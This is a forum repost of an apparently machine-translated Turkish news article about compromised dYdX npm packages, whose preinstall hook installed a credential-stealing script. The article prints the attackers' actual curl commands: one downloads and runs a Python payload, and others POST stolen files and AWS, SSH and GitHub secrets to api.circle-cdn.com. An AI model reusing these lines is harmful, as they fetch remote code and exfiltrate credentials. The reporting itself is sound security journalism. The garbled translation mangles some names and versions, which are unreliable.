Kaydol

Merhaba Sevgili Floodlar.com Kullanıcısı, Web sitemizde geçirdiğiniz zaman ve bu büyüleyici flood evrenine katılımınız için teşekkür ederiz. Floodların geniş dünyasıyla dolu deneyiminizi daha fazla keşfetmek için, web sitemizi sınırsız olarak kullanabilmeniz adına giriş yapmanız gerekmektedir.

Oturum aç

Merhaba Floodlar.com Kullanıcısı, İlk üç sayfayı tamamladınız, tebrikler! Ancak, floodların devamını görmek ve daha fazla interaktif deneyim yaşamak için giriş yapmanız gerekiyor. Hesabınız yoksa, hızlıca oluşturabilirsiniz. Sınırsız floodlar ve etkileşimler sizleri bekliyor. Giriş yapmayı unutmayın!

Şifremi hatırlamıyorum

Şifreniz mi unuttunuz? Endişelenmeyin! Lütfen kayıtlı e-posta adresinizi giriniz. Size bir bağlantı göndereceğiz ve bu link üzerinden yeni bir şifre oluşturabileceksiniz.

Fil Necati Masonlar Locası Subreddit Adı Nedir? Cevap: ( N31 )

Üzgünüz, flood girme izniniz yok, Flood girmek için giriş yapmalısınız.

Lütfen bu Floodun neden bildirilmesi gerektiğini düşündüğünüzü kısaca açıklayın.

Lütfen bu cevabın neden bildirilmesi gerektiğini kısaca açıklayın.

Lütfen bu kullanıcının neden rapor edilmesi gerektiğini düşündüğünüzü kısaca açıklayın.

Mobil Uygulamada Açın

Güncel Floodlar En sonuncu Nesne

Kripto borsaları tarafından kullanılan npm paketleri tehlikeye girdi


npm

Kripto borsası dYdX tarafından yayınlanan ve en az 44 kripto para projesi tarafından kullanılan çoklu npm paketlerinin güvenliği ihlal edilmiş gibi görünüyor.

Ethereum blok zinciri tarafından desteklenen dydX, Bitcoin (BTC) ve Ether (ETH) dahil olmak üzere 35’in üzerinde popüler kripto para birimi için sürekli ticaret seçenekleri sunan merkezi olmayan bir değişim platformudur. Yazma sırasında, platformun ortalamasını gözlemledik günlük işlem hacmi 1 milyar dolara dokundu.

Söz konusu paketler, bir dYdX personelinin npm hesabından yayınlandı ve kurulduğunda bir sistemde bilgi hırsızlarını çalıştıracak yasadışı kod içerdiği tespit edildi.

kripto borsası tarafından kullanılan npm paketleri tehlikeye girdi

Güvenlik araştırmacısı Maciej Mensfeld yazılım tedarik zinciri güvenlik firması Mend’den ve Diffend.io’nun yaratıcısı, güvenliği ihlal edilmiş birden fazla npm paketiyle karşılaştığını ve gizlice bilgi hırsızları yüklediğini bildirdi.

BleepingComputer, aşağıda gösterilen söz konusu paketlerin bir dYdX kripto platformu çalışanının npm hesabından yayınlanmış gibi göründüğünü gözlemledi, ancak bu uzlaşmanın kesin nedeni henüz belirlenmedi:

  1. @dydxprotokol/yalnız – 0.41.1, 0.41.2 sürümleri
  2. @dydxprotocol/sürekli – 1.2.2, 1.2.3 sürümleri

Daha önceki bir danışma belgesi, ‘@dydxprotocol/node-service-base-dev’ paketinin de etkilendiğini iddia etti, ancak o zamandan beri geri çekilmiş.

BleepingComputer, ‘solo’ paketinin güvenliği ihlal edilmiş 0.41.1 sürümünün hala npm’de yaşıyor yazarken:

npm paketinin güvenliği ihlal edilmiş versiyonu solo
‘solo’ npm paketinin tehlikeye atılmış versiyonu (Bipleyen Bilgisayar)

Bu paketler “dYdX Solo Ticaret Protokolü için kullanılan Ethereum Akıllı Sözleşmeleri ve TypeScript kitaplığını” oluşturur.

Örneğin, solo paket şu kişiler tarafından kullanılır: en az 44 GitHub deposu birden fazla kripto platformuna ait. Hem ‘solo’ hem de ‘sürekli’ durum için GitHub README’ler, bunların “şu anda kullanılan trade.dydx.exchange

AWS IAM kimliklerini, SSH anahtarlarını, GitHub belirteçlerini çalmak için kullanılan sahte ‘Circle’ CDN alanı

Örneğin Mensfeld, ‘solo’ paketinin manifest dosyasına enjekte edilen sorunlu kod parçasını paylaştı.

‘Solo’ paketi kurulur kurulmaz, bir ön yükleme komut dosyasının içeriğini tetikler, indirir ve çalıştırır. ci.js üzerinde barındırılan JavaScript dosyası api.circle-cdn.com.

kötü niyetli kod satırı
Bildirim dosyası package.json’da gömülü kötü amaçlı kod satırı (Bipleyen Bilgisayar)

BleepingComputer durumu “circle-cdn.com” tarafından görülen kamu malı kayıtları oldukça yakın bir zamanda, 14 Eylül’de kaydedildi.

Etki alanı adı ve kötü amaçlı dosya adında ‘ci.js’ kullanımı, büyük olasılıkla tehdit aktörünün bir yazılım geliştirme CI/CD (sürekli entegrasyon ve sürekli teslim) platformu olan CircleCI’yi taklit etme girişimleridir. Buna karşılık, CircleCI’nin resmi API’si Cloudflare tarafından barındırılır ve şu adresten erişilebilir: daireci.com/api/v2/pipeline.

“Bakıyor burada fark… a ön yükleme eklendi,” diye yazdı Mensfeld GitHub sorunu yaptıktan sonra dYdX topluluğunu uyarmak platforma ulaşma şansı yok.

Araştırmacı, “Ancak bu komut dosyası kötü niyetli görünen bir kod içeriyor… Kimlik bilgilerini ve diğer sırları çalıyor gibi görünüyor” dedi.

BleepingComputer şunu gözlemledi: ci.js Aşağıda gösterildiği gibi, güvenliği ihlal edilmiş sürümler tarafından çekilen komut dosyası, başka bir Python komut dosyasını indirir ve çalıştırır, setup.py

curl http://api.circle-cdn.com/setup.py –output cisetup.py >> /dev/null 2>&1 && python3 cisetup.py && rm cisetup.py

Bu, bilgi çalma kodunu içeren bu ‘setup.py’dir. IAM kimlik bilgileri diğer sırların yanı sıra kurbanın Amazon AWS örneğinden.

Aşağıda gösterilen ve kötü amaçlı kodun bağlandığı 169.254.xx IP adresi, Otomatik Özel IP Adresleme (APIPA) adı verilen bir özelliğin sonucudur.

APIPA, DHCP aracılığıyla otomatik bir IP adresi almak üzere yapılandırılmış bir bilgisayar çalıştırıldığında çağrılır. DHCP sunucusundan bunu yapamıyor.

Amazon AWS tarafından yayınlanan belgeler, bu IP adresinin daha geniş anlamda nasıl alakalı olduğunu gösterir. IAM bağlamı.

infostealer, IAM kimlik bilgilerini sızdırıyor
Infostealer komut dosyası setup.py, IAM kimlik bilgilerini sızdırıyor (Bipleyen Bilgisayar)

Ayrıca kod, kullanıcının GitHub belirteçlerini, SSH anahtarlarını, ortam değişkenlerini ve harici IP adresini de çalar.

Çalınan veriler daha sonra aynı api.circle-cdn.com alan adı:

subprocess.getoutput(“curl -X POST http://api.circle-cdn.com/uploader.php -F ‘uploaded_file=@” + dosyaadı2 + “‘ -F ‘gönder=Yükle'”)
subprocess.getoutput(‘curl -X POST http://api.circle-cdn.com/api.php -d “textdata=” + allen + “”‘)

BleepingComputer, kötü niyetli kodun geçmişte görülenle çarpıcı bir şekilde aynı olduğunu gözlemledi. kötü niyetli ‘PyGrata’ Python paketleri bu aynı zamanda kurbanın AWS kimlik bilgilerini, ortam değişkenlerini ve SSH anahtarlarını da çaldı.

dYdX baş mimarı Brendan Chou, Mensfeld’e teşekkür etti. derhal raporlama uzlaşma ve doğruladı “tüm [compromised versions] soloPasha_07.41.1 dışında kaldırıldı”, bunu npm’nin “geçici bir gözetim” gibi görünen şeye bağlıyor.

BleepingComputer, bu uzlaşmanın etkisini ve kapsamını daha iyi anlamak için yayınlamadan önce e-posta ve Twitter aracılığıyla dYdX’e ulaştı ve geri döndüğümüzde bu raporu güncelleyeceğiz.

Bu olay, geçen yılki popüler npm kitaplıklarının ele geçirilmesini takip ediyor.make-ayrıştırıcı-js,’ ‘coa’ ve ‘rc’ kripto madencileri ve şifre hırsızları ile bağlanmıştır. Sadece haftalar önce, PyPI paketleri bir saldırı sonucunda ele geçirildi. geliştiricileri hedefleyen kimlik avı kampanyası.

Son zamanlarda yazılım tedarik zincirine yönelik bu tür tehditler, npm ve PyPI gibi önde gelen açık kaynak kayıtlarının bakıcılar için iki faktörlü kimlik doğrulamasını zorunlu kıl en yaygın kullanılan kütüphanelerden sorumludur.



İlgili Mesajlar

Yorum eklemek için giriş yapmalısınız.